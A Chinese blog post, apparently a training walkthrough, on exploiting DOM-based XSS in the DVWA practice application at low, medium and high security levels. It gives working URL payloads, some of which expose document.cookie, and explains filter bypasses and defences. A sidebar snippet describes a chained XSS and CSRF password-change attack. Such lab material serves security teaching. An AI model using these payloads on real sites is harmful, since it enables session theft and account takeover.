DVWA系列Web常见漏洞XSS(DOM)源码分析及漏洞利用

最新推荐文章于 2024-05-25 11:17:27 发布
最新推荐文章于 2024-05-25 11:17:27 发布
阅读量1.7k 收藏 10
点赞数 1
文章标签: 前端 javascript 开发语言 xss php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57641619/article/details/124940154
版权

前言

  本期主要讲解什么是基于DOM的XSS漏洞,XSS(DOM)漏洞攻击实例,基于DOM的XSS漏洞产生的原因以及一般会在何处产生,最后讲解如何利用基于DOM的XSS漏洞(如XSS经典的窃取cookie等)。

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

基于DOM的XSS

  在讲解什么是基于DOM的XSS漏洞之前,我们先来看看什么是DOM。

什么是DOM

  所谓的DOM又称DOM树,全称为文档对象模型(Document Objeet Mode),是Web前端开发中使用到的一种模型。在前端开发中会使用到很多元素,如< title>、< h1>等,而为了方便使用这些已经定义的元素,将这些元素作为结点排成树状后,通过遍历这棵树,就可以很方便的调用这些元素。而这颗树就称为DOM树。

基于DOM的XSS产生的原因

  当js脚本从url获得数据并将其传递到支持动态代码执行的接收器时,就会产生基于DOM的XSS漏洞。也就是说不规范的使用接收器时就会产生基于DOM的XSS漏洞。因此基于DOM的XSS漏洞一般产生于用户能够进行参数输入查询的地方。以下是一些常见的接收器:

document.write()

document.writeln()

document.domain

someDOMElement.innerHTML

someDOMElement.outerHTML

someDOMElement.insertAdjacentHTML

someDOMElement.onevent

low级别源码分析

源码

可以看到low级别源码没有任何防护

漏洞利用

修改default参数(在导航栏输入),成功弹窗:

1,?default=<script>alert('1')</script>

2,?default=<script>alert(document.cookie)</script>

3,?default=<script>document.body.innerHTML="<div style=visibility:visibiliy;><h1>This is DOM XSS</h1></div>";</script>

4,?default=</option></select><img src="1" οnerrοr=alert(/XSS/)>

5,?default=>/option></select><img src="https://img.zcool.cn/community/0132485544127d0000019ae9a26624.jpg@1280w_1l_2o_100sh.jpg" width="200" height="200" οnerrοr=alert(/XSS/)>

medium级别源码分析

源码

源码中有array_key_exists()函数,检查Get传的数组中是否存在指定的键名default,如果键名存在则返回 true,如果键名不存在则返回 false。

stripos()函数,查找字符串在另一字符串中第一次出现的位置(不区分大小写),即在参数default中查找<script,如果有找到该字符串,则返回 ?default=English。

漏洞利用

过滤script,可以使用img标签、svg标签,先用

1,?default=<img src=1 οnerrοr=alert(/XSS/)>

没有弹出任何窗口 ,用f12查看代码

可以看到将xss语句插入value值中

修改default参数:

2,?default=</option></select><img src="1" οnerrοr=alert(/xss/)>

获取cookie修改如下:

3,?default=</option></select><img src=1 οnerrοr=alert(document.cookie)>

4,?default=</option></select><body οnlοad=alert(/XSS/)>

5,?default=</option></select><body οnlοad=alert(document.cookie)>

6,?default=</option></select><body οnlοad=alert(/XSS/)>

high级别源码分析

源码

该源码使用了switch()函数,在这里相当于白名单,只允许传 default值为English、French、German、Spanish 其中一个。

漏洞利用

源码中发现#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互

修改default:

?default=English #<script>alert('XSS')</script> 

?default=English#<script>alert(document.cookie)</script>

漏洞防护

DOM XSS型要是由客户端的脚本通过DOM动态地输出数祝到页面,而不是依赖将数据提交给服务器端,而从客户端获得DOM中的数据在本地执行,因而仅从服务器端是无法防御的。其防御在于以下几个方面。

(1)避免客户端文档重写、重定向或其他敏感操作,同时避免使用客户端数据,这些操作尽量在服务器端使用动态页面来实现。

(2)分析和强化客户端JS代码,特别是受到用户影响的DOM对象,注意能直接修改DOM和创建HTML文件的相关函数或方法,并在输出变量到页面时先进行编码转义,如输出到HTML则进行HTML编码,输出到<scrip>则进行JS编码。

部分资料来源于书本或网络(如若侵权,请联系笔者删除

BitterGourd.
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8244
介绍了domxss的原理和特点,并讲解了pikachu这个靶场的例子
xss原理及利用
MAPLE102424的博客
05-12 1380
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
DVWA打靶进阶】利用Python的http服务器以及xss漏洞修改受害者账户口令
最新发布
crizemire的博客
05-25 631
受害者在访问页面的一瞬间,其cookie就泄露到了远程主机,密码也被远程更改。
DVWA靶场通关记录(存储型XSS漏洞)
weixin_73557450的博客
05-29 164
而这些操作都是对message栏目实施的,name栏只是简单的替换了标签,但name栏有输入长度限制。和存储型漏洞一样的是,这回我们仍然换标签,代码中用正则表达式绕过了标签,我们可以换成或存储型XSS漏洞与反射型不同的是,存储型持续时间会很长,即便刷新页面或者关闭页面,再次打开时XSS漏洞依然会发挥作用。刷新页面或者退出页面时,我们注入的XSS攻击仍然有效,这就是存储型漏洞的特点。XSS存储型漏洞就到这里了,欢迎反馈和交流。
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2118
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
[网络安全]DVWAXSS(DOM)攻击姿势及解题详析合集
热门推荐
等风来
05-16 1万+
代码未进行任何过滤复选框中的内容为可变参数:这段 PHP 代码主要是用于处理 GET 请求中的 default 参数,它包含了以下几个功能: 1.判断是否有 default 参数:通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。 2.防止 XSS 攻击:使用 stripos() 函数查找 $default 中是否包含
Web漏洞实战教程(DVWA的使用和漏洞分析)
10-30
1. WINDOWS环境准备 4 ...1.4 DVWA安装 21 2. LINUX环境准备 25 3. 实战演练 25 3.1 实验须知 25 3.2 COMMAND EXECUTION VULNERABILITY 27 3.2.1 漏洞介绍 27 3.2.2 攻击实战 27 3.2.3 PHP
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版
03-06
Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版》是一份深入探讨Web安全领域的宝贵资,特别关注了DVWA(Damn Vulnerable Web Application)这一广泛用于安全测试和学习的在线平台。该教程全面覆盖了2013年时...
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
XSS-DOM
diemozao8175的博客
08-21 129
DOMXSS是基于DOM文档对象模型的一种漏洞 通过 HTML DOM,树中的所有节点均可通过 JavaScript 进行访问。所有 HTML 元素(节点)均可被修改,也可以创建或删除节点。(引用W3C) 因为可以在DOM树中植入js代码,因此造成了XSS-DOM漏洞,所以DOM类型的XSS可能是反射型也可能是储存型 Low <?php # No pr...
六、前端XSS——(3)DOMXSS
weixin_45540609的博客
04-25 984
一、DOMXSS DOM(Document Object Model)是一个树形模型,可以编写JavaScript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点、对象、值。DOM是一个JS可以操纵浏览器和网页显示内容的接口。 每个载入浏览器的HTML文档都会成为Documnet对象,Document对象使我们可以从脚本中队HTML页面中的所有元素进行访问 lastModified可以判断伪静态。 做domXSS一定要审计。 1.html ...
DVWAXSSDOM
ANDTM的博客
06-08 305
DOM就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)
DVWA漏洞平台学习之Medium级别
李熠专用博客_白帽子一枚,人称低危终结者
12-01 466
在Medium级别,DVWA平台对每个漏洞都加入了一定程度的WAF,它不像LOW级别那样,可以轻松的利用每个漏洞。在Medium级别下,我们需要想办法绕过WAF。 我们首先改变DVWA Security为Medium级别,然后开始对每个漏洞进行利用。 0x00 Brute Force-暴力破解 查看码: 可以拿到,它登录失败后,增加2秒的睡眠时间,我们依然可以爆破,只是增加了爆破时间而已。 0x01 Command Injection-命令注入 0x02 CSRF-客户端请求伪造 0x03 File I
【小猪学渗透】打靶第3天:DVWA入门:XSS漏洞、文件包含、CSRF
weixin_43521720的博客
03-20 839
随便输入点东西,发现了,可以输出。输入爆出xss漏洞爆出cookie。攻略上说查看代码发现<script>标签被限制了,被替换了。(话说我没怎么学php语言这个代码有点看不大懂,一会去补补)依旧爆出漏洞,说明成功了也可以通过大小写绕过这一部分的php代码算是看明白了,就是一个过滤的意思呗~那么我们使用别的标签也可以达到我们的目的。这个payload不成功,不知道哪里出的什么问题。
xssDOM
xu_1234567的博客
11-04 6512
1.DOMxss原理 dom就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)分析dom-xss之后,再说说存储型xss,其实也很好理解,存储型xss
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 1391
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3340
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 8123
该学新知识了! 目录XSS基础XSS分类反射型XSS利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
dvwa利用xss漏洞绕过csrf漏洞
05-20
DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms[0].submit();</script>`。这段代码将会自动提交我们的表单。 3. 然后,在新帖子的内容中,我们可以插入一个隐藏的表单,该表单将执行一个CSRF攻击。例如:`<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="post"><input type="hidden" name="password_new" value="newpassword"><input type="hidden" name="password_conf" value="newpassword"><input type="hidden" name="Change" value="Change"></form>`。 4. 最后,我们将在新帖子中插入一个图片,该图片的地址指向我们刚刚创建的表单。例如:`<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=newpassword&password_conf=newpassword&Change=Change" width="1" height="1">`。 5. 提交这个新帖子后,XSS代码将自动执行,并且隐藏的表单将会被提交,从而完成了CSRF攻击。 需要注意的是,这种方法只能用于绕过一些较为简单的CSRF防御措施,对于一些较为严格的防御措施是无效的。因此,在实际应用中,我们应该采取更为严格的防御措施,以确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值